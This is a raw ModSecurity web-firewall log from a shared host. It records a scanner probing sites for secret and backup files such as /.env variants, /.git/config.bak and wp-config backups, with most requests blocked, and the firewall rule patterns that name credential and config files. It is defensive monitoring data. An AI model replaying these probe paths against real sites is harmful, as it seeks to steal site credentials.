[Tue May 26 14:49:32.586141 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnZQAAAO4"]
[Tue May 26 14:49:32.599671 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnYgAAAJg"]
[Tue May 26 14:49:32.604112 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnZAAAAMU"]
[Tue May 26 14:49:32.654948 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlo7EQDDtxJNiDrdTnWgAAyGU"]
[Tue May 26 14:49:32.670281 2026] [security2:error] [pid 648203:tid 648418] [client 45.148.10.5:11892] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/wp-config.php.backup"] [unique_id "ahVlpLEQDDtxJNiDrdTnbQAAANo"]
[Tue May 26 14:49:32.805997 2026] [security2:error] [pid 648203:tid 648228] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env"] [unique_id "ahVlpLEQDDtxJNiDrdTncAAAlBg"]
[Tue May 26 14:49:32.845585 2026] [security2:error] [pid 648203:tid 648232] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.bak"] [unique_id "ahVlpLEQDDtxJNiDrdTneQAAlBw"]
[Tue May 26 14:49:32.845891 2026] [security2:error] [pid 648203:tid 648330] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.backup"] [unique_id "ahVlpLEQDDtxJNiDrdTnfAAAlH4"]
[Tue May 26 14:49:32.887073 2026] [security2:error] [pid 648203:tid 648381] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTndAAAALU"]
[Tue May 26 14:49:32.896242 2026] [security2:error] [pid 648203:tid 648371] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTndQAAAKs"]
[Tue May 26 14:49:32.921261 2026] [security2:error] [pid 648203:tid 648406] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTngAAAAM4"]
[Tue May 26 14:49:32.922077 2026] [security2:error] [pid 648203:tid 648239] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVlpLEQDDtxJNiDrdTnggAAlCM"]
[Tue May 26 14:49:32.923688 2026] [security2:error] [pid 648203:tid 648369] [client 69.48.202.178:50156] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnbgAAAKk"], referer: https://www.cagmedya.com/erzurum-web-tasarim/
[Tue May 26 14:49:32.933172 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTngQAAAMY"]
[Tue May 26 14:49:32.941877 2026] [security2:error] [pid 648203:tid 648349] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnUAAAAJU"]
[Tue May 26 14:49:33.023935 2026] [security2:error] [pid 648203:tid 648454] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTniAAAAP4"]
[Tue May 26 14:49:33.029406 2026] [security2:error] [pid 648203:tid 648341] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnhwAAAI0"]
[Tue May 26 14:49:33.047014 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnjwAAAK0"]
[Tue May 26 14:49:33.047289 2026] [security2:error] [pid 648203:tid 648348] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnjQAAlBk"]
[Tue May 26 14:49:33.101056 2026] [security2:error] [pid 648203:tid 648240] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.old"] [unique_id "ahVlpbEQDDtxJNiDrdTnlwAAlCQ"]
[Tue May 26 14:49:33.119051 2026] [security2:error] [pid 648203:tid 648416] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnkgAAANg"]
[Tue May 26 14:49:33.172864 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnqAAAAKY"]
[Tue May 26 14:49:33.177092 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnpwAAAPA"]
[Tue May 26 14:49:33.177354 2026] [security2:error] [pid 648203:tid 648435] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnpgAAAOs"]
[Tue May 26 14:49:33.178423 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnpQAAAJ4"]
[Tue May 26 14:49:33.183161 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnowAAANA"]
[Tue May 26 14:49:33.184697 2026] [security2:error] [pid 648203:tid 648441] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnpAAAAPE"]
[Tue May 26 14:49:33.190658 2026] [security2:error] [pid 648203:tid 648334] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnqQAAAIY"]
[Tue May 26 14:49:33.191017 2026] [security2:error] [pid 648203:tid 648240] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnmAAAlCQ"]
[Tue May 26 14:49:33.252565 2026] [security2:error] [pid 648203:tid 648246] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.swp"] [unique_id "ahVlpbEQDDtxJNiDrdTnuQAAlCo"]
[Tue May 26 14:49:33.320282 2026] [security2:error] [pid 648203:tid 648340] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTntAAAAIw"]
[Tue May 26 14:49:33.334212 2026] [security2:error] [pid 648203:tid 648251] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env~"] [unique_id "ahVlpbEQDDtxJNiDrdTnygAAlC8"]
[Tue May 26 14:49:33.334892 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnvQAAAJg"]
[Tue May 26 14:49:33.336127 2026] [security2:error] [pid 648203:tid 648427] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnvwAAAOM"]
[Tue May 26 14:49:33.339973 2026] [security2:error] [pid 648203:tid 648437] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnvgAAAO0"]
[Tue May 26 14:49:33.340372 2026] [security2:error] [pid 648203:tid 648367] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTntQAAAKc"]
[Tue May 26 14:49:33.347846 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnwgAAAMU"]
[Tue May 26 14:49:33.386036 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnxQAAANk"]
[Tue May 26 14:49:33.420109 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn0QAAAN4"]
[Tue May 26 14:49:33.425851 2026] [security2:error] [pid 648203:tid 648381] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTnzAAAALU"]
[Tue May 26 14:49:33.444568 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn3QAAALI"]
[Tue May 26 14:49:33.445120 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn0gAAAKk"]
[Tue May 26 14:49:33.453373 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn2wAAAPs"]
[Tue May 26 14:49:33.455589 2026] [security2:error] [pid 648203:tid 648424] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn2gAAAOA"]
[Tue May 26 14:49:33.460076 2026] [security2:error] [pid 648203:tid 648356] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn3gAAAJw"]
[Tue May 26 14:49:33.489866 2026] [security2:error] [pid 648203:tid 648218] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.git/config.old"] [unique_id "ahVlpbEQDDtxJNiDrdTn6AAAlA4"]
[Tue May 26 14:49:33.490284 2026] [security2:error] [pid 648203:tid 648225] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.git/config.bak"] [unique_id "ahVlpbEQDDtxJNiDrdTn5wAAlBU"]
[Tue May 26 14:49:33.494772 2026] [security2:error] [pid 648203:tid 648405] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn4QAAAM0"]
[Tue May 26 14:49:33.507179 2026] [security2:error] [pid 648203:tid 648236] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.git/config~"] [unique_id "ahVlpbEQDDtxJNiDrdTn6wAAlCA"]
[Tue May 26 14:49:33.559338 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn5AAAALs"]
[Tue May 26 14:49:33.566230 2026] [security2:error] [pid 648203:tid 648335] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn6QAAAIc"]
[Tue May 26 14:49:33.584162 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn7gAAAL8"]
[Tue May 26 14:49:33.591054 2026] [security2:error] [pid 648203:tid 648377] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn8QAAALE"]
[Tue May 26 14:49:33.615172 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn9AAAAPA"]
[Tue May 26 14:49:33.674972 2026] [security2:error] [pid 648203:tid 648441] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdTn9wAAAPE"]
[Tue May 26 14:49:33.698720 2026] [security2:error] [pid 648203:tid 648360] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToAgAAAKA"]
[Tue May 26 14:49:33.699068 2026] [security2:error] [pid 648203:tid 648361] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToBwAAAKE"]
[Tue May 26 14:49:33.700828 2026] [security2:error] [pid 648203:tid 648402] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToCAAAAMo"]
[Tue May 26 14:49:33.701126 2026] [security2:error] [pid 648203:tid 648338] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToBQAAAIo"]
[Tue May 26 14:49:33.706457 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToBAAAAMI"]
[Tue May 26 14:49:33.706581 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToCQAAAO4"]
[Tue May 26 14:49:33.724338 2026] [security2:error] [pid 648203:tid 648392] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToDwAAAMA"]
[Tue May 26 14:49:33.896305 2026] [security2:error] [pid 648203:tid 648433] [client 8.217.181.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToJwAAAOk"]
[Tue May 26 14:49:33.928695 2026] [security2:error] [pid 648203:tid 648453] [client 209.50.161.211:33991] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlpLEQDDtxJNiDrdTndwAAAP0"], referer: https://velanstore.ca/wp-login.php
